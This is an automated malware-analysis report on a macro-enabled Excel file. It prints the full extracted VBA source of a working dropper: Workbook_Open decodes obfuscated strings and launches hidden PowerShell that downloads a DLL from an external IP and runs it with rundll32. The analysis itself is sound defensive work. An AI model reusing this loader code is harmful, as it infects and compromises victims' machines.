MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The file is an XLSM document containing VBA macros, with a critical heuristic firing for potential Shell execution. The Workbook_Open macro is present, indicating automatic execution upon opening. While the VBA code is truncated, it appears to be designed to execute arbitrary commands, likely for downloading and running a secondary payload. No specific family could be identified.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
wer = te + Shell(hkiwe + " " + wkjh, 0) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6227 bytes |
SHA-256: 8a7e7819df6b91f47eafc2ab79d0af373d8adb5e25bdbaf0c3846296f5a42d91 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub df4yw35yhdf()
Dim iCount As Long, i As Long, j As Long, k As Long
Dim Str1 As String, Str2 As String
k = 1
iCount = Selection.Cells.Count
For i = k To iCount
Str1 = CStr(Selection.Cells(i).Value)
If Str1 <> "" Then
For j = i To iCount
Str2 = CStr(Selection.Cells(j).Value)
If i <> j And Str1 = Str2 Then Selection.Cells(j).ClearContents
Next j
End If
Next i
End Sub
Sub erfllj()
Dim lr As Long
Dim lAllCnt As Long
lAllCnt = 10000
For lr = 1 To lAllCnt
If bShowBar Then Call MyProgresBar
Next
If bShowBar Then Unload frmStatusBar
End Sub
Sub bwla4kl()
Dim lr As Long, lp As Double
Dim lAllCnt As Long
Dim s As String
lAllCnt = 10000
For lr = 1 To lAllCnt
lp = lr \ 100
s = String(lp \ 10, ChrW(10152)) & String(11 - lp \ 10, ChrW(8700))
Application.StatusBar = "????: " & lp & "% " & s: DoEvents
DoEvents
Next
Application.StatusBar = False
End Sub
Function ertjwlkfj(flkas As Long, fewo4ih As String, hnfkl34 As String, ndr54 As Long, bvret As Long) As Integer
Dim fhks, hkj23, hkiwe, wkjh As String
Dim wer As Double
fhks = "pcw"
hkj23 = fhks & "w"
fhks = "jLwCjLw:jLw\jLwWjLwijLwndjLwowjLws\SjLwysjLwtejLwm3jLw2\cjLwmjLwd.jLwejLwxjLwe"
For i = 1 To 20
Dim uow As Double
If i = 998 Then
MsgBox "q34"
End If
Next
hkiwe = rhqwoelhsld(fhks, "jLw")
wer = wer + 1
hkj23 = "aYk/aYkc saYktaaYkraYkt /aYkB /WaYkAIaYkT paYkoaYkweaYkrsaYkheaYklaYkl aYk-aYkenaYkc SQaYkBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwaYkA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzaYkAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdaYkQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABaYkhAHQAYQBcAGMAbABiAC4AZABsAGwAIgaYkA" & "aYk=" + " aYk& saYktaYkaraYkt aYkCaYk:aYk\aYkWaYkinaYkdoaYkws\SaYkysaYkteaYkmaYk3aYk2\raYkunaYkdlaYkl3aYk2.aYkeaYkxaYke aYkCaYk:aYk\aYkPraYkoaYkgraYkamaYkDaaYktaYka\caYklb.daYklaYkl,AlaYkoperNotaYkeaYkW"
For i = 5 To 30
Dim e As Integer
If i = 998 Then
e = e + i
End If
Next
wkjh = rhqwoelhsld(hkj23, "aYk")
For i = 1 To 20000000
Dim te As Double
te = Sin(i)
If i = 19999998 Then
wer = te + Shell(hkiwe + " " + wkjh, 0)
End If
Next
ertjwlkfj = 0
End Function
Sub gwolkel()
Dim lr As Long
Dim lAllCnt As Long
Const lMaxQuad As Long = 20
lAllCnt = 10000
For lr = 1 To lAllCnt
Application.StatusBar = "???: " & Int(100 * lr / lAllCnt) & "%" & String(CLng(lMaxQuad * lr / lAllCnt), ChrW(9632)) & String(lMaxQuad - CLng(lMaxQuad * lr / lAllCnt), ChrW(9633))
DoEvents
Next
Application.StatusBar = False
End Sub
Function rhqwoelhsld(ByVal jlvfd As String, bxcj As String) As String
If jlvfd = "2" And bxcj = "2" Then
Dim d As Byte
d = CByte(jlvfd)
Else
rhqwoelhsld = Replace(jlvfd, bxcj, "")
End If
End Function
Sub dgfjsldk()
Dim Workbooks As Object
NbCol = Workbooks(Fname1).Sheets(LName).Rows(1).Find(What:="Дата", LookIn:=xlValues, SearchDirection:=xlPrevious, SearchOrder:=xlByColumns).Column
Dim a(), i As Long
i = Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, 1).End(xlUp).Row
a = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(i, NbCol)).Value
ReDim B(1 To i, 1 To 1)
Do While i > 1
If dMain.exists(a(i, 1)) Then B(i, 1) = 1
i = i - 1
Loop
Dim x As Range
NbCol = Workbooks(Fname1).Sheets(LName).Cells(1, Columns.Count).End(xlToLeft).Column + 2
Erase B
Set x = Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).Find(1, , , xlWhole)
If Not x Is Nothing Then
Range(Workbooks(Fname1).Sheets(LName).Cells(1, NbCol), Workbooks(Fname1).Sheets(LName).Cells(Rows.Count, NbCol)).ColumnDifferences(x).EntireRow.Hidden = True
End If
End Sub
Private Sub Workbook_Open()
Dim fojn As Long
Dim x, y, z As Double
Dim hnfkj As String
wejlfkdjf
hnfkj = "a"
End Sub
Public Sub wejlfkdjf()
Dim fojn As Long
Dim fjl As String
fjl = "w"
fojn = ertjwlkfj(0, "", "", 0, 0)
If fojn = 123 Then
fjl = "r" & fjl
End If
End Sub
Sub ghayh45aghf()
Dim lAllCnt As Long, lr As Long
Dim rc As Range
lAllCnt = Selection.Count
For Each rc In Selection
lr = lr + 1
Application.StatusBar = "??: " & Int(100 * lr / lAllCnt) & "%"
DoEvents
Next
Application.StatusBar = False
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 27648 bytes |
SHA-256: 5362a865257aaafdd7503136b910382ca531abb77dbd01c8752c8a55e02b821b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.